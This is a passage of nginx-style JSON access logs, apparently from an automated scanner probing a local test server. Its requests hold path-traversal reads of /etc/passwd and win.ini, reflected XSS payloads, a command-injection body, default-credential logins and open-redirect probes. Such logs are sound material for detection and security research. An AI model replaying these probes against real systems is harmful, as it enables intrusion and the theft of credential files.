/https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5mCKvZtoWz9r8qQn7KWDfI6A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"name=ADMIN&pwd=ADMIN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"name=admin&pwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/29N5mA6ZWYbaqqdKMsnex4GxeWU/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 